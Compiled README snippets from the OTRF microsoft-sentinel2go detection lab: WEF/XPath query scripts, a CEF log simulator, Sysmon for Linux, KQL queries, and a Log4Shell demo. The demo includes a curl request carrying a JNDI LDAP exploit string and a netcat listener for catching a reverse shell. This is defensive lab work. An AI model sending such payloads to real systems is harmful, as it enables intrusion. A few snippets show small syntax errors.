### Example XPath Query Output Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/README.md An example of the output format generated by the XPath query export script. This string represents a formatted query suitable for certain Windows event collection configurations. ```Text Security!*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and (Level=4 or Level=0) and EventID=4740]] ``` -------------------------------- ### Read Account-Lockout.xml Example Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/README.md Loads the 'Account-Lockout.xml' file as an XML object and displays its inner XML content. This is useful for inspecting the structure of a specific WEF query definition. ```PowerShell [xml]$Account = get-content .\Account-Lockout.xml $Account.InnerXml ``` -------------------------------- ### Start Netcat Listener Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md Initiate a netcat listener on a specified port to capture incoming connections. This is used here to receive a reverse shell. ```bash nc -lvnp 443 ``` -------------------------------- ### CEF Simulator Debug Log Output Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md This is an example of the output found in the cef_simulator_debug.log file, showing the parsing and sending of a custom CEF event. ```text 05/26/2021 08:39:49 AM ----------------------- 05/26/2021 08:39:49 AM Parsing a custom sample event.. 05/26/2021 08:39:49 AM Reading CEF event samples.. 05/26/2021 08:39:49 AM Parsing replace file.. 05/26/2021 08:39:49 AM Values to replace: {'SRCTESTIP': '1.2.3.4', 'DSTTESTIP': '10.0.0.1'} 05/26/2021 08:39:49 AM CEF Server: 127.0.0.1 05/26/2021 08:39:49 AM CEF Port: 514 05/26/2021 08:39:49 AM ----------------------- 05/26/2021 08:39:49 AM Sending event: PAN Morto RDP Request 05/26/2021 08:39:49 AM Setting current datetime: May 26 2021 08:39:49 .. 05/26/2021 08:39:49 AM Replacing value SRCTESTIP with 1.2.3.4 05/26/2021 08:39:49 AM Replacing value DSTTESTIP with 10.0.0.1 05/26/2021 08:39:49 AM Sending the following message: 0|Palo Alto Networks|PAN-OS|9.1.0-h3|Morto RDP Request Traffic(13274)|THREAT|2|rt=May 26 2021 08:39:49 deviceExternalId=RANDOMID src=1.2.3.4 dst=10.0.0.1 sourceTranslatedAddress=10.0.0.1 destinationTranslatedAddress=1.2.3.4 cs1Label=Rule cs1=RDP Inbound suser= duser= app=ms-rdp cs3Label=Virtual System cs3=vsys1 cs4Label=Source Zone cs4=Untrust cs5Label=Destination Zone cs5=Trust deviceInboundInterface=ethernet1/1 deviceOutboundInterface=ethernet1/2 cs6Label=LogProfile cs6=default cn1Label=SessionID cn1=86053 cnt=1 spt=2687 dpt=3389 sourceTranslatedPort=51475 destinationTranslatedPort=3389 flexString1Label=Flags flexString1=0x402000 proto=tcp act=alert request="" cs2Label=URL Category cs2=any flexString2Label=Direction flexString2=client-to-server PanOSActionFlags=0x2000000000000000 externalId=2316 cat=Morto RDP Request Traffic(13274) fileId=0 PanOSDGl1=0 PanOSDGl2=0 PanOSDGl3=0 PanOSDGl4=0 PanOSVsysName= dvchost=pannwfusiondemo PanOSSrcUUID= PanOSDstUUID= PanOSTunnelID=0 PanOSMonitorTag= PanOSParent SessionID=0 PanOSParentStartTime= PanOSTunnelType=N/A PanOSThreatCategory=net-worm PanOSContentVer=AppThreat-8224-5855 PanOSAssocID=0 PanOSPPID=4294967295 PanOSHTTPHeader="personal-sites-and-blogs,high-risk" PanOSURLCatList="personal-sites-and-blogs,high-risk" PanOSRuleUUID=c60266c3-fcfd-4f99-b921-54d5aaae7a54 PanOSHTTP2Con=0|data1=example.. 05/26/2021 08:39:49 AM Executing the following command: ['logger', '-p', 'local4.warn', '-t', 'CEF:', '0|Palo Alto Networks|PAN-OS|9.1.0-h3|Morto RDP Request Traffic(13274)|THREAT|2|rt=May 26 2021 08:39:49 deviceExternalId=RANDOMID src=1.2.3.4 dst=10.0.0.1 sourceTranslatedAddress=10.0.0.1 destinationTranslatedAddress=1.2.3.4 cs1Label=Rule cs1=RDP Inbound suser= duser= app=ms-rdp cs3Label=Virtual System cs3=vsys1 cs4Label=Source Zone cs4=Untrust cs5Label=Destination Zone cs5=Trust deviceInboundInterface=ethernet1/1 deviceOutboundInterface=ethernet1/2 cs6Label=LogProfile cs6=default cn1Label=SessionID cn1=86053 cnt=1 spt=2687 dpt=3389 sourceTranslatedPort=51475 destinationTranslatedPort=3389 flexString1Label=Flags flexString1=0x402000 proto=tcp act=alert request="" cs2Label=URL Category cs2=any flexString2Label=Direction flexString2=client-to-server PanOSActionFlags=0x2000000000000000 externalId=2316 cat=Morto RDP Request Traffic(13274) fileId=0 PanOSDGl1=0 PanOSDGl2=0 PanOSDGl3=0 PanOSDGl4=0 PanOSVsysName= dvchost=pannwfusiondemo PanOSSrcUUID= PanOSDstUUID= PanOSTunnelID=0 PanOSMonitorTag= PanOSParent SessionID=0 PanOSParentStartTime= PanOSTunnelType=N/A PanOSThreatCategory=net-worm PanOSContentVer=AppThreat-8224-5855 PanOSAssocID=0 PanOSPPID=4294967295 PanOSHTTPHeader="personal-sites-and-blogs,high-risk" PanOSURLCatList="personal-sites-and-blogs,high-risk" PanOSRuleUUID=c60266c3-fcfd-4f99-b921-54d5aaae7a54 PanOSHTTP2Con=0|data1=example', '-P', '514', '-n', '127.0.0.1'].. ``` -------------------------------- ### Account Lockout WEF Query Example Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/README.md An example XML query definition for capturing account lockout events (Event ID 4740) from the Security log on Windows Domain Controllers. This query is designed to be used with Windows Event Forwarding. ```XML ``` -------------------------------- ### Custom CEF Message Example Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md An example of a custom CEF message for Palo Alto Networks PAN-OS. This message details a 'Morto RDP Request Traffic' event. ```cef 0|Palo Alto Networks|PAN-OS|9.1.0-h3|Morto RDP Request Traffic(13274)|THREAT|2|rt=DATETIME deviceExternalId=RANDOMID src=SRCTESTIP dst=DSTTESTIP sourceTranslatedAddress=DSTTESTIP destinationTranslatedAddress=SRCTESTIP cs1Label=Rule cs1=RDP Inbound suser= duser= app=ms-rdp cs3Label=Virtual System cs3=vsys1 cs4Label=Source Zone cs4=Untrust cs5Label=Destination Zone cs5=Trust deviceInboundInterface=ethernet1/1 deviceOutboundInterface=ethernet1/2 cs6Label=LogProfile cs6=default cn1Label=SessionID cn1=86053 cnt=1 spt=2687 dpt=3389 sourceTranslatedPort=51475 destinationTranslatedPort=3389 flexString1Label=Flags flexString1=0x402000 proto=tcp act=alert request="" cs2Label=URL Category cs2=any flexString2Label=Direction flexString2=client-to-server PanOSActionFlags=0x2000000000000000 externalId=2316 cat=Morto RDP Request Traffic(13274) fileId=0 PanOSDGl1=0 PanOSDGl2=0 PanOSDGl3=0 PanOSDGl4=0 PanOSVsysName= dvchost=pannwfusiondemo PanOSSrcUUID= PanOSDstUUID= PanOSTunnelID=0 PanOSMonitorTag= PanOSParent SessionID=0 PanOSParentStartTime= PanOSTunnelType=N/A PanOSThreatCategory=net-worm PanOSContentVer=AppThreat-8224-5855 PanOSAssocID=0 PanOSPPID=4294967295 PanOSHTTPHeader="personal-sites-and-blogs,high-risk" PanOSURLCatList="personal-sites-and-blogs,high-risk" PanOSRuleUUID=c60266c3-fcfd-4f99-b921-54d5aaae7a54 PanOSHTTP2Con=0 ``` -------------------------------- ### Check Sysmon Service Status Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/Sysmon-For-Linux/README.md Verify if the Sysmon service is running on a Linux machine. This command is useful for confirming a successful installation. ```bash systemctl status sysmon ``` -------------------------------- ### Trigger Log4Shell Vulnerability Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md Send a crafted HTTP GET request with a malicious User-Agent header to a vulnerable application to exploit CVE-2021-44228. ```bash curl -X GET -H 'user-agent: ${jndi:ldap://192.168.2.6:1389/o=reference}' 127.0.0.1:8080/Log4j-2.14.0-SNAPSHOT/api ``` -------------------------------- ### Download OSSEM ATT&CK Mapping File (PowerShell) Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md Initializes a WebClient, sets the security protocol to TLS 1.2, and downloads the specified JSON mapping file to the current directory. ```PowerShell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $wc = new-object System.Net.WebClient) $wc.DownloadFile($uri, "techniques_to_events_mapping.json") ``` -------------------------------- ### Create CEF Sample YAML File Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md Use a text editor like 'nano' to create a YAML file for your CEF sample. This file will contain the custom CEF message. ```bash nano paloAltoMortoRDPRequest.yaml ``` -------------------------------- ### Query Sysmon Process Creation Events using ASIM Parser Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/Sysmon-For-Linux/README.md Retrieve the latest 10 process creation events from Sysmon for Linux using the VimProcessCreateLinuxSysmon ASIM parser in Microsoft Sentinel. This leverages normalized data for easier querying. ```kql VimProcessCreateLinuxSysmon | limit 10 ``` -------------------------------- ### Run CEF Simulator Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md Execute the cef_simulator.py script with your sample event file and replacement values file. The --debug flag provides verbose output. ```bash python3 cef_simulator.py -e paloAltoMortoRDPRequest.yaml -r cef_replace.yaml --debug ``` -------------------------------- ### Accept Azure VM Marketplace Terms Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Win10-PAN-FW/README.md Execute this Azure CLI command to accept the legal terms for the Palo Alto Networks VM-Series firewall 'bundle2' with version '7.1.1'. This is a prerequisite for deploying the VM from the Azure Marketplace. ```bash az vm image terms accept --urn paloaltonetworks:vmseries1:bundle2:7.1.1 ``` -------------------------------- ### List Azure VM Images Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Win10-PAN-FW/README.md Use this Azure CLI command to list all available VM images for Palo Alto Networks VM-Series firewall, specifically for the 'bundle2' SKU. This helps identify the correct URN for accepting terms. ```bash az vm image list --all --publisher paloaltonetworks --offer vmseries1 --sku bundle2 --query '[0].urn' ``` -------------------------------- ### Navigate to Script Directory Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md Change the current directory to the location where custom scripts are downloaded. This is typically '/var/lib/waagent/custom-script/download/0'. ```bash cd /var/lib/waagent/custom-script/download/0 ``` -------------------------------- ### Switch to Admin User Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md After SSHing into the CEF VM, switch to the root user using sudo su. This is necessary for executing administrative commands. ```bash sudo su root@CEF-SYSLOG:/home/# ``` -------------------------------- ### Create Replacement Values YAML File Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md Create a YAML file to specify values that will replace placeholders in the CEF message. Use 'nano' for file creation. ```bash nano cef_replace.yaml ``` -------------------------------- ### List Running Docker Containers Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md Use this command to see all currently running Docker containers on the system. ```bash docker ps ``` -------------------------------- ### Export Queries from WEF Subscriptions Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/README.md Iterates through all XML files in the current directory, parses them as WEF subscriptions, extracts the CDATA query content, and saves each query to a separate file in a 'Queries' subdirectory. This script helps in organizing and extracting individual queries from subscription files. ```PowerShell $all = Get-ChildItem *.xml ForEach ( $file in $all){ $fileName = Split-Path $file -Leaf [xml]$subscription = get-content $file [xml]$xmlContent = $subscription.Subscription.Query.'#cdata-section' $StringWriter = New-Object System.IO.StringWriter $XmlWriter = New-Object System.XMl.XmlTextWriter $StringWriter $xmlWriter.Formatting = "indented" $xmlWriter.Indentation = 2 $xmlWriter.IndentChar = ' ' $xmlContent.WriteContentTo($XmlWriter) $XmlWriter.Flush() $StringWriter.Flush() $StringWriter.ToString() | out-file "Queries\$fileName" } ``` -------------------------------- ### View Docker Container Logs Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md Follow the logs of a specific Docker container in real-time. Replace 'rogue-jndi' with the actual container name. ```bash docker logs --follow rogue-jndi ``` -------------------------------- ### Prepare Request Parameters Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Custom-Logs-Pipeline/README.md Defines the parameters for the Invoke-RestMethod cmdlet, including the URI, method, request body converted to JSON, and content type. ```PowerShell $params = @{ Uri = $orchestrator Method = "Post" Body = $shippingRequest | Convertto-json -Depth 10 ContentType = 'application/json' Verbose = $true } ``` -------------------------------- ### SSH into CEF VM Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md Connect to your CEF virtual machine using SSH. Replace placeholders with your actual username and public IP address. ```bash ssh @ ``` -------------------------------- ### Run XML Query with Get-WinEvent Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/README.md Executes a previously loaded XML query using the Get-WinEvent cmdlet. This allows for testing and retrieving events directly from the command line based on the defined XML filter. ```PowerShell Get-WinEvent -FilterXml $Account ``` -------------------------------- ### Clone Palantir WEF Repository Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/README.md Clones the official Palantir Windows Event Forwarding repository and navigates to the WEF subscription directory. This is the initial step for using the provided scripts. ```PowerShell git clone https://github.com/palantir/windows-event-forwarding cd windows-event-forwarding/wef-subscription ``` -------------------------------- ### Explore Sysmon Events with sysmonLogView Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/Sysmon-For-Linux/README.md View Sysmon event ID 1 (ProcessCreate) events in a formatted way using the sysmonLogView utility. This command pipes Syslog output to sysmonLogView for filtering. ```bash sudo tail -f /var/log/syslog | sudo /opt/sysmon/sysmonLogView -e 1 ``` -------------------------------- ### Enable SCX Verbose Logging Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-38647-OMI/README.md Use this command to set all SCX logging levels to verbose. This is useful for detailed debugging and troubleshooting. ```bash /opt/microsoft/scx/bin/tools/scxadmin -log-set all verbose ``` -------------------------------- ### Generate Data Sources JSON for Windows Event Logs Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md This script iterates through all XML files in the current directory, extracts XPath queries, and constructs a JSON object defining data sources for Windows Event Logs. The output is saved to 'ossem-attack.json'. ```PowerShell $allFiles = Get-ChildItem -Path *.xml $AllDataSources = @() $DataSource = [ordered]@{} # Name of Data Source $DataSource['Name'] = "eventLogsDataSource" # Transfer Period $DataSource['scheduledTransferPeriod'] = "PT1M" # Streams $DataSource['streams'] = @( "Microsoft-SecurityEvent" ) # Process XPath Queries $DataSource['xPathQueries'] = @() foreach ($file in $allFiles){ [xml]$XmlQuery = Get-Content -path $file $queries = $xmlQuery.QueryList.Query ForEach ($query in $queries){ $QueryString = "$(-join ($query.Select.Path, '!', $query.Select.'#text'))" if ("$QueryString" -notin $DataSource['xPathQueries']){ $DataSource['xPathQueries'] += $QueryString } } } $AllDataSources += $DataSource @{ windowsEventLogs = $AllDataSources } | Convertto-Json -Depth 4 | ForEach-Object { [System.Text.RegularExpressions.Regex]::Unescape($_) } | Set-Content "ossem-attack.json" ``` -------------------------------- ### CEF Sample YAML Content Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md Paste the custom CEF message into the 'event' field of your YAML file. This configures the event details for the simulator. ```yaml name: PAN Morto RDP Request platform: Palo Alto Networks priority: facility: local4 level: warn event: 0|Palo Alto Networks|PAN-OS|9.1.0-h3|Morto RDP Request Traffic(13274)|THREAT|2|rt=DATETIME deviceExternalId=RANDOMID src=SRCTESTIP dst=DSTTESTIP sourceTranslatedAddress=DSTTESTIP destinationTranslatedAddress=SRCTESTIP cs1Label=Rule cs1=RDP Inbound suser= duser= app=ms-rdp cs3Label=Virtual System cs3=vsys1 cs4Label=Source Zone cs4=Untrust cs5Label=Destination Zone cs5=Trust deviceInboundInterface=ethernet1/1 deviceOutboundInterface=ethernet1/2 cs6Label=LogProfile cs6=default cn1Label=SessionID cn1=86053 cnt=1 spt=2687 dpt=3389 sourceTranslatedPort=51475 destinationTranslatedPort=3389 flexString1Label=Flags flexString1=0x402000 proto=tcp act=alert request="" cs2Label=URL Category cs2=any flexString2Label=Direction flexString2=client-to-server PanOSActionFlags=0x2000000000000000 externalId=2316 cat=Morto RDP Request Traffic(13274) fileId=0 PanOSDGl1=0 PanOSDGl2=0 PanOSDGl3=0 PanOSDGl4=0 PanOSVsysName= dvchost=pannwfusiondemo PanOSSrcUUID= PanOSDstUUID= PanOSTunnelID=0 PanOSMonitorTag= PanOSParent SessionID=0 PanOSParentStartTime= PanOSTunnelType=N/A PanOSThreatCategory=net-worm PanOSContentVer=AppThreat-8224-5855 PanOSAssocID=0 PanOSPPID=4294967295 PanOSHTTPHeader="personal-sites-and-blogs,high-risk" PanOSURLCatList="personal-sites-and-blogs,high-risk" PanOSRuleUUID=c60266c3-fcfd-4f99-b921-54d5aaae7a54 PanOSHTTP2Con=0 ``` -------------------------------- ### Inspect CEF Simulator Debug Log Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md Use the 'cat' command to view the contents of the cef_simulator_debug.log file, which contains detailed information about the CEF event processing. ```bash cat cef_simulator_debug.log ``` -------------------------------- ### Display First Mapping Object (PowerShell) Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md Selects and displays the first object from the loaded JSON mappings array for a quick test. ```PowerShell $mappings[0] ``` -------------------------------- ### Explore Syslog Events Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/Sysmon-For-Linux/README.md Monitor real-time Syslog events in the /var/log/Syslog file. This command is helpful for observing system-level messages as they occur. ```bash tail –f /var/log/Syslog ``` -------------------------------- ### Generate XML Query Files from PowerShell Hash Table Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md This script takes the prepared hash table of security events and generates individual XML query files for each data source. It uses `System.Xml.XmlTextWriter` to create indented XML with comments and query elements, including filtering logic for specific events. The generated files are saved with names derived from the data source. ```PowerShell foreach ($ds in $allMappings.Keys){ $fileName = -join (($ds -replace " ","-").ToLower(), '.xml') $StringWriter = New-Object System.IO.StringWriter $XmlWriter = New-Object System.XMl.XmlTextWriter $StringWriter $xmlWriter.Formatting = "indented" $xmlWriter.Indentation = 2 $xmlWriter.IndentChar = ' ' $xmlWriter.WriteStartDocument() $xmlWriter.WriteStartElement("QueryList") $xmlWriter.WriteComment("ATT&CK Data Source - $ds") $Counter = 0 foreach ($dc in $allMappings[$ds].Keys) { # Create query element $xmlWriter.WriteStartElement("Query") $xmlWriter.WriteAttributeString("Id", "$Counter") $xmlWriter.WriteAttributeString("Path", "Security") $xmlWriter.WriteComment("ATT&CK Data Component - $dc") # Create query strings $query = "" $leftover = @() foreach ($event in $allMappings[$ds][$dc]){ $xmlWriter.WriteComment("$($Event.EventID) - $($Event.EventName)") if ($Event.Filters){ $leftover += $Event } else { $query = -join ($query, " EventID=$($Event.EventID) ") if (!($allMappings[$ds][$dc][-1]['EventID'] -eq $($Event.EventID))){ $query = -join ($query, "or") } } } if ($allMappings[$ds][$dc].Count -ne $leftover.Count){ $query = $query.Trim() $query = -join ("*[System[( ", $query, ")]]") if ($leftover.Count -ne 0){ $query = -join ($query, ' or ') } } # Process leftover if ($leftover){ foreach ($l in $leftover){ $query = -join ($query, "(*[System[EventID=$($l.EventID)]] and (") foreach ($f in $l.Filters) { $key = $f | get-member -MemberType NoteProperty | select -expandproperty Name $query = -join ($query, "(*[EventData[Data[@Name='$($key)']='$($f.$key)'") if (!($l.Filters[-1] -eq $($f))){ $query = -join ($query, "]] or ") } else { $query = -join ($query, "]]))) ") } } if (!($leftover[-1] -eq $($l))){ $query = -join ($query, " or ") } } } # Create Select (query) Element $xmlWriter.WriteStartElement("Select") $xmlWriter.WriteAttributeString("Path", "Security") $xmlWriter.WriteString("$query") $xmlWriter.WriteEndElement() | out-null $xmlWriter.WriteEndElement() | out-null $counter += 1 } # Write Close Tag for QueryList Element $xmlWriter.WriteEndDocument() | out-null # Finish The Document $xmlWriter.Flush() | out-null $StringWriter.Flush() | out-null #Create File $StringWriter.ToString() | out-file $fileName $xmlWriter.Close() } ``` -------------------------------- ### Prepare Request Body Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Custom-Logs-Pipeline/README.md Constructs the JSON payload for the request, specifying the title, destination, and dataset details including the event log URL and source name. ```PowerShell $SimulationRequest = @{ title = 'Proof of Concept' destination = 'AzureLogAnalytics' datasets = @( @{ number = 1 eventLogUrl = 'https://github.com/OTRF/Security-Datasets/raw/SecurityDatasets2.0/datasets/atomic/windows/190518-RegKeyModification-WDigestDowngrade/WORKSTATION6_Windows_Security.zip' eventSourceName = 'Microsoft-Windows-Security-Auditing' } ) } ``` -------------------------------- ### Monitor SCX Log Output Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-38647-OMI/README.md This command tails the SCX log file in real-time. It is helpful for observing log messages as they are generated. ```bash tail -f /var/opt/microsoft/scx/log/scx.log ``` -------------------------------- ### Load and Display Windows Registry XML Query Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md Loads an XML file containing Windows registry queries into a PowerShell variable and displays its inner XML content. This is useful for inspecting the structure of the query file. ```PowerShell [xml]$registry = Get-Content .\windows-registry.xml $registry.innerXml ``` -------------------------------- ### Replacement Values YAML Content Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md Define key-value pairs in this YAML file to substitute specific placeholders like IP addresses within the CEF message. ```yaml SRCTESTIP: 1.2.3.4 DSTTESTIP: 10.0.0.1 ``` -------------------------------- ### View OMS Auditd Configuration Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md Display the contents of the AUOMS configuration file to check its active settings. ```bash cat /etc/audisp/plugins.d/auoms.conf ``` -------------------------------- ### Read JSON Mapping File (PowerShell) Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md Reads the downloaded JSON mapping file and converts its content into a PowerShell object. ```PowerShell $mappings = Get-Content .\techniques_to_events_mapping.json | ConvertFrom-Json ``` -------------------------------- ### Define OSSEM ATT&CK Mapping URI (PowerShell) Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md Sets a variable to the URI of the OSSEM DM relationships mapped to ATT&CK JSON file. ```PowerShell $uri = "https://raw.githubusercontent.com/OTRF/OSSEM-DM/main/use-cases/mitre_attack/techniques_to_events_mapping.json" ``` -------------------------------- ### CEF Simulator ASCII Art Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md This section displays the ASCII art for the CEF simulator tool. ```text _________ ______________________ \_ ___ \ \_ _____/\_ _____/ / \ \/ | __)_ | __) \ \____ | \ | \ \______ //_______ / \___ / \/ \/ \/ _________.____ .__ __ / _____/|__| _____ __ __ | | _____ _/ |_ ____ _______ \_____ \ | | / \ | | \| | \__ \ \ __\/ _ \\_ __ \ / \| || Y Y \| | /| |__ / __ \ | | ( <_> )| | \/ /_______ /|__||__|_| /|____/ |____/(____ /|__| \____/ |__| V0.1 Creator: Roberto Rodriguez @Cyb3rWard0g License: GPL-3.0 ----------------------- CEF Server: 127.0.0.1 CEF Port: 514 ----------------------- Sending event: PAN Morto RDP Request ``` -------------------------------- ### Check Tomcat Service Status Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md Use this command to verify if the Tomcat service is running on an Ubuntu system. ```bash service tomcat status ``` -------------------------------- ### Query Sysmon for Linux Events in Microsoft Sentinel Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/Sysmon-For-Linux/README.md Analyze Sysmon for Linux logs stored in the Syslog table within Microsoft Sentinel. This Kusto query parses XML messages to extract EventID and EventData for summarization. ```kql Syslog | extend EventID = parse_xml(SyslogMessage).Event.System.EventID | extend EventData = parse_xml(SyslogMessage).Event.EventData.Data | mv-expand bagexpansion=array EventData | evaluate bag_unpack(EventData) | extend Key=tostring(['@Name']), Value=['#text'] | evaluate pivot( Key, any(Value), TimeGenerated, TenantId, SourceSystem, EventID, Computer, Facility, SeverityLevel, HostIP, MG, Type, _ResourceId ) | summarize count() by tostring(EventID) ``` -------------------------------- ### Copy PCAP File from Azure VM Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md This command allows you to securely copy the captured PCAP file from your Azure VM to your local machine using SCP. Replace 'user', 'x.x.x.x', and the local path with your specific details. ```bash scp user@x.x.x.x:/home/user/log4jShell.pcap C:\Users\YOU\Downloads\ ``` -------------------------------- ### Export XPath Query for Windows Security Events Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/README.md Extracts and formats XPath queries from a loaded WEF subscription object. It combines the 'Path' and the '#text' content of the 'Select' element, separated by '!'. This is useful for configuring Windows Security Events Connector. ```PowerShell $Account.QueryList.Query | ForEach-Object {-join ($_.Select.Path, '!', $_.Select.'#text') } ``` -------------------------------- ### Windows Security Events XPath Queries Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md A JSON configuration snippet listing XPath queries for collecting various Windows Security Events. These queries are used to define which events are ingested by the Microsoft Sentinel Windows Security Events Connector. ```json { "windowsEventLogs": [ { "Name": "eventLogsDataSource", "scheduledTransferPeriod": "PT1M", "streams": [ "Microsoft-SecurityEvent" ], "xPathQueries": [ "Security!*[System[(EventID=5136 or EventID=5139)]]", "Security!*[System[(EventID=5137)]]", "Security!*[System[(EventID=5141)]]", "Security!*[System[(EventID=4662 or EventID=4661)]]", "Security!*[System[(EventID=4768 or EventID=4769)]]", "Security!*[System[(EventID=4688)]]", "Security!*[System[(EventID=4660)]]", "Security!(*[System[EventID=4656]] and ((*[EventData[Data[@Name='ObjectType']='File']])))" or (*[System[EventID=4663]] and ((*[EventData[Data[@Name='ObjectType']='File']])))" or (*[System[EventID=4661]] and ((*[EventData[Data[@Name='ObjectType']='SAM']]))) ", "Security!*[System[(EventID=4670)]]", "Security!*[System[(EventID=4624 or EventID=4778 or EventID=4964)]]", "Security!*[System[(EventID=5140 or EventID=5145)]]", "Security!*[System[(EventID=5154 or EventID=5159 or EventID=5155 or EventID=5158 or EventID=5156 or EventID=5157 or EventID=5031)]]", "Security!(*[System[EventID=4656]] and ((*[EventData[Data[@Name='ObjectType']='Process']])))" or (*[System[EventID=4663]] and ((*[EventData[Data[@Name='ObjectType']='Process']])))", "Security!*[System[(EventID=4689)]]", "Security!*[System[(EventID=4698)]]", "Security!*[System[(EventID=4701 or EventID=4700 or EventID=4702)]]", "Security!*[System[(EventID=4697)]]", "Security!*[System[(EventID=4725 or EventID=4722 or EventID=4717 or EventID=4740 or EventID=4738 or EventID=4781 or EventID=4767 or EventID=4718)]]", "Security!*[System[(EventID=4624 or EventID=4625 or EventID=4648)]]", "Security!*[System[(EventID=4726)]]", "Security!*[System[(EventID=4720)]]", "Security!*[System[(EventID=4670 or EventID=4657)]]", "Security!(*[System[EventID=4656]] and ((*[EventData[Data[@Name='ObjectType']='Key']])))" or (*[System[EventID=4663]] and ((*[EventData[Data[@Name='ObjectType']='Key']])))" ] } ] } ``` -------------------------------- ### Send Request to Orchestrator Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Custom-Logs-Pipeline/README.md Executes the HTTP POST request to the Azure Function orchestrator using the prepared parameters. ```PowerShell Invoke-RestMethod @params ``` -------------------------------- ### Extract and Format XPath Queries from XML Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md Parses an XML file containing event queries, extracts the Path and Select text, formats them into a specific string, and collects unique queries. This script is used to prepare queries for data collection rules. ```PowerShell [xml]$registry = Get-Content .\windows-registry.xml $registry.QueryList.Query | ForEach-Object {-join ($_.Select.Path, '!', $_.Select.'#text') } ``` -------------------------------- ### Capture Network Traffic with tcpdump Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md Use this command on Ubuntu to capture network traffic to a PCAP file, filtering by host IP addresses. This is useful for analyzing network activity during a Log4Shell exploit attempt. ```bash tcpdump -i eth0 -w log4jShell.pcap host 192.168.2.5 and host 192.168.2.6 ``` -------------------------------- ### Query Sysmon Logs in Microsoft Sentinel 